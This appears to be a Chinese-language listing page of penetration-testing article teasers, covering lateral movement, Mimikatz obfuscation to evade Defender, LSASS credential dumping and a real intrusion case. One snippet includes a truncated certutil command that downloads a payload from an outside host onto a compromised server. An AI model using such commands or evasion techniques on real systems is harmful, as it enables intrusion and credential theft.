1、概述本篇文章继续记录内网渗透方面域内横向移动技术。2、内容2.1 常用Windows远程连接和相关命令拿到目标计算机的用户明文密码或者NTLM Hash后,可通过PTH(pass the hash...
内网横向移动—PTH哈希&PTT票据&PTK密匙&Kerberos
0.前言由于都是发自己的文章,所以也不会有那么多的内容发布,一周可能也就更新个两篇,如果工作忙,可能一周就一篇,但是文章都会很细致,暂时只更新学习笔记,至于挖洞思路,小菜鸟还不配。0.1.免责声明传播...
混淆 Mimikatz 下载器以逃避 Defender (2024)
大家好,今天我将展示如何混淆 Mimikatz 下载器以绕过 Defender 检测。我将使用安装了 Visual Studio 和 python 的虚拟机,我还有 Documents 文件夹作为 W...
混淆 Mimikatz 下载程序以逃避 Defender(2024)
大家好,今天我将展示如何混淆 Mimikatz 下载程序以绕过 Defender 检测。我将使用安装了 Visual Studio 和 python 的虚拟机,同时在 Windows Defender...
记一次看似简单到处是坑的入口打点
一次攻防演练,发现目标存在一个用友的web2019年的,应该有戏,尝试exp一打没想到这么顺利,看来拿到权限也是分分钟的事情,进入webshell顺手执行一个whoami仔细看这个错误,whoami后...
渗透测试某国外站点
主要流程:sql注入->cerutil绕df写入文件->webshell上线cs->提权->内网某天闲的无聊没事做,用谷歌语法测测国外的站猛的一打开阿 发现这个网站,哥们英文...
【内网渗透】内网信息收集的十三种基本方式
~ 混口饭,简单生活,足矣 ~前言本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,本文用的windows server 2019内核版本比较高,还有一些信息收集技巧行不...
2024 年如何使用 Mimikatz 进行黑客攻击:权威指南
本综合指南将向您展示如何使用 Mimikatz 进行黑客攻击,以便您可以像专业人士一样转储凭据并执行横向移动。Mimikatz 是您将使用的最受欢迎的黑客工具之一,也是渗透测试和红队参与的行业标准。 ...
实战|某次极为顺畅的实战案例
真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。一、金蝶云星空RCEshell之后尝试上线(出网)certutil -urlcache -split -f http://xx.xx.xx....
不使用 Mimikatz 转储 Lsass 的两种方法
本地安全机构子系统服务(或更广为人知的 LSASS)是 Windows 服务器的核心软件之一。它负责在系统上执行安全策略。它验证连接到 Windows 计算机或服务器的用户、处理密码更改并创建访问令牌...
实战分享 | 记一次对挖矿木马的样本分析
前一段时间做了个应急响应,病毒样本是用Python写的,正好来分析学习下。0x01 云沙箱检测首先丢进微步查看可以看到病毒释放m2.sp1文件,并且执行cmd和powershell程序。0x02 样本...
内网渗透-导出HASH的多种方式
原文首发在:奇安信攻防社区https://forum.butian.net/share/3653在内网渗透中当我们得到一台高权限用户的身份时,就可以抓取到当前机器上的各类密码。虽然任务要求是导出域ha...
24